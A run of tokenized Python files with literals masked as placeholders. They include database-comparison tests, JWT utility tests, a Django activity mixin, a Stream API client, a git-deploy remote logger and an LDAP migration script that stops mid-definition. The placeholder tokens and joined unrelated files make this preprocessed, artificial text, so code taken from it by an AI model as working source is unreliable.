EXPECTED_TABLE_LIST [ <NUM_LIT:5> ] ) , <EOL> "<STR_LIT>" % <EOL> self . EXPECTED_TABLE_LIST [ <NUM_LIT:5> ] ) <EOL> self . assertFalse ( self . conn . table_exists ( self . NOT_A_TABLE ) , <EOL> "<STR_LIT>" % <EOL> self . NOT_A_TABLE ) <EOL> def test_table_list ( self ) : <EOL> "<STR_LIT>" <EOL> tab_list = self . conn . table_list ( ) <EOL> self . assertEqual ( tab_list , self . EXPECTED_TABLE_LIST ) <EOL> def test_column_list ( self ) : <EOL> "<STR_LIT>" <EOL> col_list = self . conn . column_list ( self . COLUMN_LIST_TABLE ) <EOL> self . assertEqual ( col_list , self . EXPECTED_COLUMN_LIST ) <EOL> def test_primary_key_simple ( self ) : <EOL> "<STR_LIT>" <EOL> pkey = self . conn . primary_key ( self . SIMPLE_PKEY_TABLE ) <EOL> self . assertEqual ( pkey , self . EXPECTED_SIMPLE_PKEY ) <EOL> def test_primary_key_compound ( self ) : <EOL> "<STR_LIT>" <EOL> pkey = self . conn . primary_key ( self . COMPOUND_PKEY_TABLE ) <EOL> self . assertEqual ( pkey , self . EXPECTED_COMPOUND_PKEY ) <EOL> def test_primary_key_sref ( self ) : <EOL> "<STR_LIT>" <EOL> pkey = self . conn . primary_key ( self . SREF_PKEY_TABLE ) <EOL> self . assertEqual ( pkey , self . EXPECTED_SREF_PKEY ) <EOL> def tearDown ( self ) : <EOL> if self . conn : <EOL> self . conn . close ( ) <EOL> dbutil . TESTSERVER . drop ( self . dbname ) <EOL> class TestCompareFunctions ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> SUITE = '<STR_LIT>' <EOL> INPUT_DIR = dbutil . input_directory ( MODULE , SUITE ) <EOL> OUTPUT_DIR = dbutil . output_directory ( MODULE , SUITE ) <EOL> EXPECTED_DIR = dbutil . expected_directory ( MODULE , SUITE ) <EOL> VERSION = dbutil . version_or_user ( ) <EOL> DB_LIST = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> def setUp ( self ) : <EOL> self . db_count = len ( self . DB_LIST ) <EOL> self . conn = [ None ] * self . db_count <EOL> self . dbname = [ None ] * self . db_count <EOL> for i in range ( self . db_count ) : <EOL> self . dbname [ i ] = self . VERSION + "<STR_LIT>" + str ( i ) <EOL> if not dbutil . TESTSERVER . exists ( self . dbname [ i ] ) : <EOL> dbutil . TESTSERVER . create ( self . dbname [ i ] , <EOL> self . INPUT_DIR , <EOL> self . DB_LIST [ i ] ) <EOL> self . conn [ i ] = dbutil . TESTSERVER . connect ( self . dbname [ i ] ) <EOL> def test_compare_empty ( self ) : <EOL> "<STR_LIT>" <EOL> result = dbcompare . compare_databases ( self . conn [ <NUM_LIT:0> ] , self . conn [ <NUM_LIT:1> ] , <EOL> verbosity = <NUM_LIT:2> ) <EOL> self . assertTrue ( result , "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> def test_compare_equal_tables ( self ) : <EOL> "<STR_LIT>" <EOL> result = dbcompare . compare_tables ( self . conn [ <NUM_LIT:0> ] , self . conn [ <NUM_LIT:2> ] , <EOL> '<STR_LIT>' , verbosity = <NUM_LIT:2> ) <EOL> self . assertTrue ( result , "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> def test_compare_different ( self ) : <EOL> "<STR_LIT>" <EOL> file_name = '<STR_LIT>' <EOL> output = StringIO . StringIO ( ) <EOL> result = dbcompare . compare_databases ( self . conn [ <NUM_LIT:0> ] , self . conn [ <NUM_LIT:2> ] , <EOL> verbosity = <NUM_LIT:3> , output = output ) <EOL> output_file_path = os . path . join ( self . OUTPUT_DIR , file_name ) <EOL> with open ( output_file_path , '<STR_LIT:w>' ) as output_file : <EOL> output_file . write ( output . getvalue ( ) ) <EOL> self . assertFalse ( result , "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> expected_file_path = os . path . join ( self . EXPECTED_DIR , file_name ) <EOL> if os . path . isfile ( expected_file_path ) : <EOL> with open ( expected_file_path ) as expected_file : <EOL> expected_str = expected_file . read ( ) <EOL> self . assertEqual ( output . getvalue ( ) , expected_str ) <EOL> else : <EOL> self . skipTest ( "<STR_LIT>" ) <EOL> def test_compare_unequal_tables ( self ) : <EOL> "<STR_LIT>" <EOL> file_name = '<STR_LIT>' <EOL> output = StringIO . StringIO ( ) <EOL> result = dbcompare . compare_tables ( self . conn [ <NUM_LIT:0> ] , self . conn [ <NUM_LIT:2> ] , <EOL> '<STR_LIT>' , verbosity = <NUM_LIT:3> , <EOL> output = output ) <EOL> output_file_path = os . path . join ( self . OUTPUT_DIR , file_name ) <EOL> with open ( output_file_path , '<STR_LIT:w>' ) as output_file : <EOL> output_file . write ( output . getvalue ( ) ) <EOL> self . assertFalse ( result , "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> expected_file_path = os . path . join ( self . EXPECTED_DIR , file_name ) <EOL> if os . path . isfile ( expected_file_path ) : <EOL> with open ( expected_file_path ) as expected_file : <EOL> expected_str = expected_file . read ( ) <EOL> self . assertEqual ( output . getvalue ( ) , expected_str ) <EOL> else : <EOL> self . skipTest ( "<STR_LIT>" ) <EOL> def tearDown ( self ) : <EOL> for i in range ( self . db_count ) : <EOL> if self . conn [ i ] : <EOL> self . conn [ i ] . close ( ) <EOL> def the_suite ( ) : <EOL> """<STR_LIT>""" <EOL> test_classes = [ <EOL> TestReporter , <EOL> TestComparisonWrapper , <EOL> TestCompareFunctions <EOL> ] <EOL> suite_list = map ( unittest . defaultTestLoader . loadTestsFromTestCase , <EOL> test_classes ) <EOL> suite = unittest . TestSuite ( suite_list ) <EOL> return suite <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( the_suite ( ) ) </s>
<s> import json <EOL> import base64 <EOL> import pytest <EOL> import jwt . exceptions <EOL> from django . test import TestCase <EOL> from rest_framework_jwt import utils <EOL> from rest_framework_jwt . compat import get_user_model <EOL> from rest_framework_jwt . settings import api_settings , DEFAULTS <EOL> User = get_user_model ( ) <EOL> def base64url_decode ( input ) : <EOL> rem = len ( input ) % <NUM_LIT:4> <EOL> if rem > <NUM_LIT:0> : <EOL> input += b'<STR_LIT:=>' * ( <NUM_LIT:4> - rem ) <EOL> return base64 . urlsafe_b64decode ( input ) <EOL> class UtilsTests ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . username = '<STR_LIT>' <EOL> self . email = '<STR_LIT>' <EOL> self . user = User . objects . create_user ( self . username , self . email ) <EOL> def test_jwt_payload_handler ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> pytest . deprecated_call ( utils . jwt_payload_handler , self . user ) <EOL> self . assertTrue ( isinstance ( payload , dict ) ) <EOL> self . assertEqual ( payload [ '<STR_LIT>' ] , self . user . pk ) <EOL> self . assertEqual ( payload [ '<STR_LIT:email>' ] , self . email ) <EOL> self . assertEqual ( payload [ '<STR_LIT:username>' ] , self . username ) <EOL> self . assertTrue ( '<STR_LIT>' in payload ) <EOL> def test_jwt_encode ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> payload_data = base64url_decode ( token . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> ] . encode ( '<STR_LIT:utf-8>' ) ) <EOL> payload_from_token = json . loads ( payload_data . decode ( '<STR_LIT:utf-8>' ) ) <EOL> self . assertEqual ( payload_from_token , payload ) <EOL> def test_jwt_decode ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> decoded_payload = utils . jwt_decode_handler ( token ) <EOL> self . assertEqual ( decoded_payload , payload ) <EOL> def test_jwt_response_payload ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> response_data = utils . jwt_response_payload_handler ( token ) <EOL> self . assertEqual ( response_data , dict ( token = token ) ) <EOL> def test_jwt_decode_verify_exp ( self ) : <EOL> api_settings . JWT_VERIFY_EXPIRATION = False <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> payload [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> utils . jwt_decode_handler ( token ) <EOL> api_settings . JWT_VERIFY_EXPIRATION = True <EOL> class TestAudience ( TestCase ) : <EOL> def setUp ( self ) : <EOL> api_settings . JWT_AUDIENCE = '<STR_LIT>' <EOL> self . username = '<STR_LIT>' <EOL> self . email = '<STR_LIT>' <EOL> self . user = User . objects . create_user ( self . username , self . email ) <EOL> return super ( TestAudience , self ) . setUp ( ) <EOL> def test_fail_audience_missing ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> del payload [ '<STR_LIT>' ] <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> with self . assertRaises ( jwt . exceptions . MissingRequiredClaimError ) : <EOL> utils . jwt_decode_handler ( token ) <EOL> def test_fail_audience_wrong ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> payload [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> with self . assertRaises ( jwt . exceptions . InvalidAudienceError ) : <EOL> utils . jwt_decode_handler ( token ) <EOL> def test_correct_audience ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> decoded_payload = utils . jwt_decode_handler ( token ) <EOL> self . assertEqual ( decoded_payload , payload ) <EOL> def tearDown ( self ) : <EOL> api_settings . JWT_AUDIENCE = DEFAULTS [ '<STR_LIT>' ] <EOL> class TestIssuer ( TestCase ) : <EOL> def setUp ( self ) : <EOL> api_settings . JWT_ISSUER = '<STR_LIT>' <EOL> self . username = '<STR_LIT>' <EOL> self . email = '<STR_LIT>' <EOL> self . user = User . objects . create_user ( self . username , self . email ) <EOL> return super ( TestIssuer , self ) . setUp ( ) <EOL> def test_fail_issuer_missing ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> del payload [ '<STR_LIT>' ] <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> with self . assertRaises ( jwt . exceptions . MissingRequiredClaimError ) : <EOL> utils . jwt_decode_handler ( token ) <EOL> def test_fail_issuer_wrong ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> payload [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> with self . assertRaises ( jwt . exceptions . InvalidIssuerError ) : <EOL> utils . jwt_decode_handler ( token ) <EOL> def test_correct_issuer ( self ) : <EOL> payload = utils . jwt_payload_handler ( self . user ) <EOL> token = utils . jwt_encode_handler ( payload ) <EOL> decoded_payload = utils . jwt_decode_handler ( token ) <EOL> self . assertEqual ( decoded_payload , payload ) <EOL> def tearDown ( self ) : <EOL> api_settings . JWT_ISSUER = DEFAULTS [ '<STR_LIT>' ] </s>
<s> from django . db import models <EOL> from django . template . defaultfilters import slugify <EOL> from django . utils . timezone import is_aware <EOL> from django . utils . timezone import make_naive <EOL> import pytz <EOL> def model_content_type ( cls ) : <EOL> return '<STR_LIT>' % ( cls . _meta . app_label , cls . _meta . object_name ) <EOL> def create_reference ( reference ) : <EOL> if isinstance ( reference , ( models . Model , ) ) : <EOL> return create_model_reference ( reference ) <EOL> return reference <EOL> def create_model_reference ( model_instance ) : <EOL> '''<STR_LIT>''' <EOL> content_type = model_content_type ( model_instance . __class__ ) <EOL> content_id = model_instance . pk <EOL> return '<STR_LIT>' % ( content_type , content_id ) <EOL> class Activity ( object ) : <EOL> @ property <EOL> def activity_author_feed ( self ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> @ classmethod <EOL> def activity_related_models ( cls ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> @ property <EOL> def extra_activity_data ( self ) : <EOL> '''<STR_LIT>''' <EOL> pass <EOL> @ property <EOL> def activity_actor_attr ( self ) : <EOL> '''<STR_LIT>''' <EOL> return self . user <EOL> @ property <EOL> def activity_object_attr ( self ) : <EOL> '''<STR_LIT>''' <EOL> raise NotImplementedError ( '<STR_LIT>' % self . __class__ . __name__ ) <EOL> @ property <EOL> def activity_actor_id ( self ) : <EOL> return self . activity_actor_attr . pk <EOL> @ property <EOL> def activity_actor ( self ) : <EOL> return create_reference ( self . activity_actor_attr ) <EOL> @ property <EOL> def activity_verb ( self ) : <EOL> model_name = slugify ( self . __class__ . __name__ ) <EOL> return model_name <EOL> @ property <EOL> def activity_object ( self ) : <EOL> return create_reference ( self . activity_object_attr ) <EOL> @ property <EOL> def activity_foreign_id ( self ) : <EOL> return self . activity_object <EOL> @ property <EOL> def activity_time ( self ) : <EOL> atime = self . created_at <EOL> if is_aware ( self . created_at ) : <EOL> atime = make_naive ( atime , pytz . utc ) <EOL> return atime <EOL> @ property <EOL> def activity_notify ( self ) : <EOL> pass <EOL> def create_activity ( self ) : <EOL> extra_data = self . extra_activity_data <EOL> if not extra_data : <EOL> extra_data = { } <EOL> to = self . activity_notify <EOL> if to : <EOL> extra_data [ '<STR_LIT:to>' ] = [ f . id for f in to ] <EOL> activity = dict ( <EOL> actor = self . activity_actor , <EOL> verb = self . activity_verb , <EOL> object = self . activity_object , <EOL> foreign_id = self . activity_foreign_id , <EOL> time = self . activity_time , <EOL> ** extra_data <EOL> ) <EOL> return activity </s>
<s> from datetime import datetime <EOL> import json <EOL> import logging <EOL> import os <EOL> from httpsig . requests_auth import HTTPSignatureAuth <EOL> import jwt <EOL> import requests <EOL> from requests . adapters import HTTPAdapter <EOL> from stream import exceptions , serializer <EOL> from stream . signing import sign <EOL> from stream . utils import validate_feed_slug , validate_user_id <EOL> from requests import Request <EOL> logger = logging . getLogger ( __name__ ) <EOL> class StreamClient ( object ) : <EOL> base_url = '<STR_LIT>' <EOL> def __init__ ( self , api_key , api_secret , app_id , version = '<STR_LIT>' , timeout = <NUM_LIT> , base_url = None , location = None ) : <EOL> '''<STR_LIT>''' <EOL> self . api_key = api_key <EOL> self . api_secret = api_secret <EOL> self . app_id = app_id <EOL> self . version = version <EOL> self . timeout = timeout <EOL> self . location = location <EOL> if os . environ . get ( '<STR_LIT>' ) : <EOL> self . base_url = '<STR_LIT>' <EOL> self . timeout = <NUM_LIT:20> <EOL> elif base_url is not None : <EOL> self . base_url = base_url <EOL> elif location is not None : <EOL> self . base_url = '<STR_LIT>' % location <EOL> self . base_analytics_url = '<STR_LIT>' <EOL> self . session = requests . Session ( ) <EOL> self . session . mount ( self . base_url , HTTPAdapter ( max_retries = <NUM_LIT:0> ) ) <EOL> self . auth = HTTPSignatureAuth ( api_key , secret = api_secret ) <EOL> def feed ( self , feed_slug , user_id ) : <EOL> '''<STR_LIT>''' <EOL> from stream . feed import Feed <EOL> feed_slug = validate_feed_slug ( feed_slug ) <EOL> user_id = validate_user_id ( user_id ) <EOL> feed_id = '<STR_LIT>' % ( feed_slug , user_id ) <EOL> token = sign ( self . api_secret , feed_id ) <EOL> return Feed ( self , feed_slug , user_id , token ) <EOL> def get_default_params ( self ) : <EOL> '''<STR_LIT>''' <EOL> params = dict ( api_key = self . api_key ) <EOL> return params <EOL> def get_default_header ( self ) : <EOL> base_headers = { <EOL> '<STR_LIT>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT>' : self . get_user_agent ( ) <EOL> } <EOL> return base_headers <EOL> def get_full_url ( self , relative_url ) : <EOL> url = self . base_url + self . version + '<STR_LIT:/>' + relative_url <EOL> return url <EOL> def get_user_agent ( self ) : <EOL> from stream import __version__ <EOL> agent = '<STR_LIT>' % __version__ <EOL> return agent <EOL> def _parse_response ( self , response ) : <EOL> try : <EOL> parsed_result = serializer . loads ( response . text ) <EOL> except ValueError : <EOL> parsed_result = None <EOL> if parsed_result is None or parsed_result . get ( '<STR_LIT>' ) or response . status_code >= <NUM_LIT> : <EOL> self . raise_exception ( parsed_result , status_code = response . status_code ) <EOL> return parsed_result <EOL> def _make_signed_request ( self , method_name , relative_url , params = None , data = None ) : <EOL> params = params or { } <EOL> data = data or { } <EOL> serialized = None <EOL> headers = self . get_default_header ( ) <EOL> headers [ '<STR_LIT>' ] = self . api_key <EOL> date_header = datetime . utcnow ( ) . strftime ( '<STR_LIT>' ) <EOL> headers [ '<STR_LIT>' ] = date_header <EOL> default_params = self . get_default_params ( ) <EOL> default_params . update ( params ) <EOL> url = self . get_full_url ( relative_url ) <EOL> serialized = serializer . dumps ( data ) <EOL> method = getattr ( self . session , method_name ) <EOL> if method_name in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> serialized = serializer . dumps ( data ) <EOL> response = method ( url , auth = self . auth , data = serialized , headers = headers , <EOL> params = default_params , timeout = self . timeout ) <EOL> logger . debug ( '<STR_LIT>' , <EOL> response . url , headers , data ) <EOL> return self . _parse_response ( response ) <EOL> def create_jwt_token ( self , resource , action , feed_id = None , user_id = None ) : <EOL> '''<STR_LIT>''' <EOL> payload = { <EOL> '<STR_LIT:action>' : action , <EOL> '<STR_LIT>' : resource <EOL> } <EOL> if feed_id is not None : <EOL> payload [ '<STR_LIT>' ] = feed_id <EOL> if user_id is not None : <EOL> payload [ '<STR_LIT>' ] = user_id <EOL> return jwt . encode ( payload , self . api_secret ) <EOL> def _make_request ( self , method , relative_url , signature , params = None , data = None ) : <EOL> params = params or { } <EOL> data = data or { } <EOL> serialized = None <EOL> default_params = self . get_default_params ( ) <EOL> default_params . update ( params ) <EOL> headers = self . get_default_header ( ) <EOL> headers [ '<STR_LIT>' ] = signature <EOL> headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> url = self . get_full_url ( relative_url ) <EOL> if method . __name__ in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> serialized = serializer . dumps ( data ) <EOL> response = method ( url , data = serialized , headers = headers , <EOL> params = default_params , timeout = self . timeout ) <EOL> logger . debug ( '<STR_LIT>' , <EOL> response . url , headers , data ) <EOL> return self . _parse_response ( response ) <EOL> def raise_exception ( self , result , status_code ) : <EOL> '''<STR_LIT>''' <EOL> from stream . exceptions import get_exception_dict <EOL> exception_class = exceptions . StreamApiException <EOL> def errors_from_fields ( exception_fields ) : <EOL> result = [ ] <EOL> for field , errors in exception_fields . items ( ) : <EOL> errors . append ( '<STR_LIT>' % ( field , repr ( errors ) ) ) <EOL> return result <EOL> if result is not None : <EOL> error_message = result [ '<STR_LIT>' ] <EOL> exception_fields = result . get ( '<STR_LIT>' ) <EOL> if exception_fields is not None : <EOL> errors = [ ] <EOL> if isinstance ( exception_fields , list ) : <EOL> errors = [ errors_from_fields ( exception_dict ) for exception_dict in exception_fields ] <EOL> errors = [ item for sublist in errors for item in sublist ] <EOL> else : <EOL> errors = errors_from_fields ( exception_fields ) <EOL> error_message = '<STR_LIT:\n>' . join ( errors ) <EOL> error_code = result . get ( '<STR_LIT:code>' ) <EOL> exception_dict = get_exception_dict ( ) <EOL> exception_class = exception_dict . get ( <EOL> error_code , exceptions . StreamApiException ) <EOL> else : <EOL> error_message = '<STR_LIT>' % status_code <EOL> exception = exception_class ( error_message , status_code = status_code ) <EOL> raise exception <EOL> def post ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> return self . _make_request ( self . session . post , * args , ** kwargs ) <EOL> def get ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> return self . _make_request ( self . session . get , * args , ** kwargs ) <EOL> def delete ( self , * args , ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> return self . _make_request ( self . session . delete , * args , ** kwargs ) <EOL> def add_to_many ( self , activity , feeds ) : <EOL> '''<STR_LIT>''' <EOL> data = { '<STR_LIT>' : activity , '<STR_LIT>' : feeds } <EOL> self . _make_signed_request ( '<STR_LIT>' , '<STR_LIT>' , data = data ) <EOL> def follow_many ( self , follows , activity_copy_limit = None ) : <EOL> '''<STR_LIT>''' <EOL> params = None <EOL> if activity_copy_limit != None : <EOL> params = dict ( activity_copy_limit = activity_copy_limit ) <EOL> self . _make_signed_request ( '<STR_LIT>' , '<STR_LIT>' , params = params , data = follows ) <EOL> def update_activities ( self , activities ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( activities , ( list , tuple , set ) ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> auth_token = self . create_jwt_token ( '<STR_LIT>' , '<STR_LIT:*>' , feed_id = '<STR_LIT:*>' ) <EOL> data = dict ( activities = activities ) <EOL> return self . post ( '<STR_LIT>' , auth_token , data = data ) <EOL> def update_activity ( self , activity ) : <EOL> '''<STR_LIT>''' <EOL> return self . update_activities ( [ activity ] ) <EOL> def create_redirect_url ( self , target_url , user_id , events ) : <EOL> '''<STR_LIT>''' <EOL> auth_token = self . create_jwt_token ( '<STR_LIT>' , '<STR_LIT:*>' , user_id = user_id ) <EOL> params = dict ( auth_type = '<STR_LIT>' , authorization = auth_token , url = target_url ) <EOL> params [ '<STR_LIT>' ] = self . api_key <EOL> params [ '<STR_LIT>' ] = json . dumps ( events ) <EOL> url = self . base_analytics_url + '<STR_LIT>' <EOL> request = Request ( '<STR_LIT:GET>' , url , params = params ) <EOL> prepared_request = request . prepare ( ) <EOL> Request ( '<STR_LIT:GET>' , target_url ) . prepare ( ) <EOL> return prepared_request . url </s>
<s> """<STR_LIT>""" <EOL> __date__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> import re <EOL> from git_deploy . utils import ssh_command_target <EOL> from git_deploy . config import log <EOL> class DeployLogError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message = "<STR_LIT>" , exit_code = <NUM_LIT:1> ) : <EOL> Exception . __init__ ( self , message ) <EOL> self . _exit_code = int ( exit_code ) <EOL> @ property <EOL> def exit_code ( self ) : <EOL> return self . _exit_code <EOL> class DeployLogDefault ( object ) : <EOL> """<STR_LIT>""" <EOL> LOGNAME_ARCHIVE = '<STR_LIT>' <EOL> LOGNAME_ACTIVE = '<STR_LIT>' <EOL> __instance = None <EOL> def __init__ ( self , target , path , user , local_key_path ) : <EOL> """<STR_LIT>""" <EOL> self . __class__ . __instance = self <EOL> self . target = target <EOL> self . path = path + '<STR_LIT>' <EOL> self . user = user <EOL> self . key_path = local_key_path <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if not cls . __instance : <EOL> cls . __instance = super ( DeployLogDefault , cls ) . __new__ ( cls ) <EOL> return cls . __instance <EOL> def _check_and_add ( self , path , filename ) : <EOL> """<STR_LIT>""" <EOL> cmd = '<STR_LIT>' . format ( path , filename ) <EOL> ret = ssh_command_target ( cmd , self . target , self . user , self . key_path ) <EOL> if int ( ret [ '<STR_LIT>' ] [ <NUM_LIT:0> ] . strip ( ) ) > <NUM_LIT:0> : <EOL> cmd = '<STR_LIT>' . format ( path , filename ) <EOL> ssh_command_target ( cmd , self . target , self . user , self . key_path ) <EOL> def log ( self , line ) : <EOL> """<STR_LIT>""" <EOL> self . _check_and_add ( self . path , self . LOGNAME_ACTIVE ) <EOL> re . escape ( line ) <EOL> cmd = "<STR_LIT>" . format ( line , self . path , <EOL> self . LOGNAME_ACTIVE ) <EOL> try : <EOL> ssh_command_target ( cmd , self . target , self . user , self . key_path ) <EOL> except : <EOL> log . error ( "<STR_LIT>" . format ( line ) ) <EOL> return False <EOL> return True <EOL> def log_archive ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _check_and_add ( self . path , self . LOGNAME_ARCHIVE ) <EOL> cmd = "<STR_LIT>" . format ( self . path , <EOL> self . LOGNAME_ACTIVE , <EOL> self . path , <EOL> self . LOGNAME_ARCHIVE ) <EOL> try : <EOL> ssh_command_target ( cmd , self . target , self . user , self . key_path ) <EOL> except : <EOL> log . error ( "<STR_LIT>" ) <EOL> return False <EOL> cmd = "<STR_LIT>" . format ( self . path , self . LOGNAME_ACTIVE ) <EOL> try : <EOL> ssh_command_target ( cmd , self . target , self . user , self . key_path ) <EOL> except : <EOL> log . error ( "<STR_LIT>" ) <EOL> return False <EOL> return True </s>
<s> import os <EOL> import os . path <EOL> import shutil <EOL> import sys <EOL> import traceback <EOL> from ldif import LDIFParser <EOL> from jsonmerge import merge <EOL> import base64 <EOL> import json <EOL> import uuid <EOL> import tempfile <EOL> import logging <EOL> password_file = tempfile . mkstemp ( ) [ <NUM_LIT:1> ] <EOL> backup24_folder = None <EOL> backup_version = None <EOL> current_version = None <EOL> service = "<STR_LIT>" <EOL> ldapmodify = "<STR_LIT>" <EOL> ldapsearch = "<STR_LIT>" <EOL> ldapdelete = "<STR_LIT>" <EOL> ignore_files = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ldap_creds = [ '<STR_LIT>' , '<STR_LIT:localhost>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , password_file <EOL> ] <EOL> logging . basicConfig ( level = logging . DEBUG , <EOL> format = '<STR_LIT>' , <EOL> filename = '<STR_LIT>' , <EOL> filemode = '<STR_LIT:w>' ) <EOL> console = logging . StreamHandler ( ) <EOL> console . setLevel ( logging . INFO ) <EOL> formatter = logging . Formatter ( '<STR_LIT>' ) <EOL> console . setFormatter ( formatter ) <EOL> logging . getLogger ( '<STR_LIT>' ) . addHandler ( console ) <EOL> class MyLDIF ( LDIFParser ) : <EOL> def __init__ ( self , input , output ) : <EOL> LDIFParser . __init__ ( self , input ) <EOL> self . targetDN = None <EOL> self . targetAttr = None <EOL> self . targetEntry = None <EOL> self . DNs = [ ] <EOL> self . lastDN = None <EOL> self . lastEntry = None <EOL> def getResults ( self ) : <EOL> return ( self . targetDN , self . targetAttr ) <EOL> def getDNs ( self ) : <EOL> return self . DNs <EOL> def getLastEntry ( self ) : <EOL> return self . lastEntry <EOL> def handle ( self , dn , entry ) : <EOL> if self . targetDN is None : <EOL> self . targetDN = dn <EOL> self . lastDN = dn <EOL> self . DNs . append ( dn ) <EOL> self . lastEntry = entry <EOL> if dn . lower ( ) . strip ( ) == self . targetDN . lower ( ) . strip ( ) : <EOL> self . targetEntry = entry <EOL> if self . targetAttr in entry : <EOL> self . targetAttr = entry [ self . targetAttr ] <EOL> def addEntry ( dn , entry , ldifModFolder ) : <EOL> newLdif = """<STR_LIT>""" % dn <EOL> for attr in entry . keys ( ) : <EOL> for value in entry [ attr ] : <EOL> newLdif = newLdif + getMod ( attr , value ) <EOL> newLdif = newLdif + "<STR_LIT:\n>" <EOL> new_fn = str ( len ( dn . split ( '<STR_LIT:U+002C>' ) ) ) + '<STR_LIT:_>' + str ( uuid . uuid4 ( ) ) <EOL> filename = '<STR_LIT>' % ( ldifModFolder , new_fn ) <EOL> f = open ( filename , '<STR_LIT:w>' ) <EOL> f . write ( newLdif ) <EOL> f . close ( ) <EOL> def getNewConfig ( fn ) : <EOL> args = [ ldapsearch ] + ldap_creds + [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> output = getOutput ( args ) <EOL> f = open ( fn , '<STR_LIT:w>' ) <EOL> f . write ( output ) <EOL> f . close ( ) <EOL> logging . info ( "<STR_LIT>" % fn ) <EOL> def copyFiles ( backup24_folder ) : <EOL> logging . info ( '<STR_LIT>' ) <EOL> os . path . walk ( "<STR_LIT>" % backup24_folder , walk_function , None ) <EOL> os . path . walk ( "<STR_LIT>" % backup24_folder , walk_function , None ) <EOL> os . path . walk ( "<STR_LIT>" % backup24_folder , walk_function , None ) <EOL> def deleteEntries ( dn_list ) : <EOL> for dn in dn_list : <EOL> cmd = [ ldapdelete ] + ldap_creds + [ dn ] <EOL> output = getOutput ( cmd ) <EOL> if output : <EOL> logging . info ( output ) <EOL> else : <EOL> logging . error ( "<STR_LIT>" % dn ) <EOL> def getAttributeValue ( fn , targetAttr ) : <EOL> parser = MyLDIF ( open ( fn , '<STR_LIT:rb>' ) , sys . stdout ) <EOL> parser . targetAttr = targetAttr <EOL> parser . parse ( ) <EOL> value = parser . targetAttr <EOL> return value <EOL> def getOldEntryMap ( folder ) : <EOL> files = os . listdir ( folder ) <EOL> dnMap = { } <EOL> admin_dn = getDns ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> for fn in files : <EOL> if '<STR_LIT>' in fn and '<STR_LIT>' in backup_version : <EOL> continue <EOL> dnList = getDns ( "<STR_LIT>" % ( folder , fn ) ) <EOL> for dn in dnList : <EOL> if fn == '<STR_LIT>' and admin_dn in dn : <EOL> continue <EOL> dnMap [ dn ] = fn <EOL> return dnMap <EOL> def getEntry ( fn , dn ) : <EOL> parser = MyLDIF ( open ( fn , '<STR_LIT:rb>' ) , sys . stdout ) <EOL> parser . targetDN = dn <EOL> parser . parse ( ) <EOL> return parser . targetEntry <EOL> def getDns ( fn ) : <EOL> parser = MyLDIF ( open ( fn , '<STR_LIT:rb>' ) , sys . stdout ) <EOL> parser . parse ( ) <EOL> return parser . DNs <EOL> def getMod ( attr , s ) : <EOL> val = str ( s ) . strip ( ) <EOL> if val . find ( '<STR_LIT:\n>' ) > - <NUM_LIT:1> : <EOL> val = base64 . b64encode ( val ) <EOL> return "<STR_LIT>" % tab_attr ( attr , val , True ) <EOL> elif len ( val ) > ( <NUM_LIT> - len ( attr ) ) : <EOL> return "<STR_LIT>" % tab_attr ( attr , val ) <EOL> else : <EOL> return "<STR_LIT>" % ( attr , val ) <EOL> def getOutput 